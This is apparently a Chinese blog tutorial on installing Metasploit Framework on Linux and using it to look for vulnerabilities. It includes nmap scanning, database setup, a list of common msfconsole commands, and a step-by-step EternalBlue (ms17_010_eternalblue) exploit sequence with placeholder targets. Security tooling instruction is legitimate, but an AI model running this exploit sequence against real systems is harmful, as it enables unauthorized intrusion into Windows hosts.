Linux.x安装使用Metasploit Framework查找漏洞
作者QQ:67065435 QQ群:669756510
本站内容全部为作者原创,转载请注明出处!
安装相关软件
安装nmap
yum -y --nogpgcheck install nmap nmap <IP>安装httpd-tools
yum -y --nogpgcheck install httpd-tools ab -c 10 -n 10 https://www.baidu.com/-
1. 从以下链接获取rpm包 https://rpm.metasploit.com/ 2. 安装上一步获取的rpm包 rpm -ivh metasploit-framework-6.4.4+20240415102613~1rapid7-1.el6.x86_64.rpm 3. 修改用户 chown -R www:www /opt/metasploit-framework 4. 查看版本 msfconsole -v 连接postgresql
su www cd ~ msfconsole db_status color -h banner -h connect -h bundle install ;👇这里使用msfdb init👇 msfdb init|start|stop|reinit|deletenmap开放端口
db_nmap <IP>永恒之蓝示例
# 使用 永恒之蓝 模块 use exploit/windows/smb/ms17_010_eternalblue # 查看模块支持参数 show options # 设置模块参数 set RHOSTS <IP> set RPORT <PORT> set LHOSTS <IP> set LPORT <PORT> # 查看模块参数 show options # 运行 HTTP弱点扫描 模块 run|exploit
msf常用指令
msf常用指令
# 搜索模块 msf> search name:<模块名称的一部分> msf> search type:all|encoders|nops|exploits|payloads|auxiliary|post|plugins|info|options|favorites msf> search name:<模块名称的一部分> type:all|encoders|nops|exploits|payloads|auxiliary|post|plugins|info|options|favorites # 展示模块 msf> show all|encoders|nops|exploits|payloads|auxiliary|post|plugins|info|options|favorites # 使用模块 msf> use <模块名称> # 退出模块 msf> back # 模块信息 msf> info <模块名称> # 检查指定IP是否存在漏洞 msf> use <模块名称> msf> check <IP> # 执行.rc文件 msf> resource <.rc文件路径> # 查看数据库连接状态 msf> db_status # 创建数据库连接 msf> db_connect # 关闭数据库连接 msf> db_disconnect # 退出msf控制台 msf> exit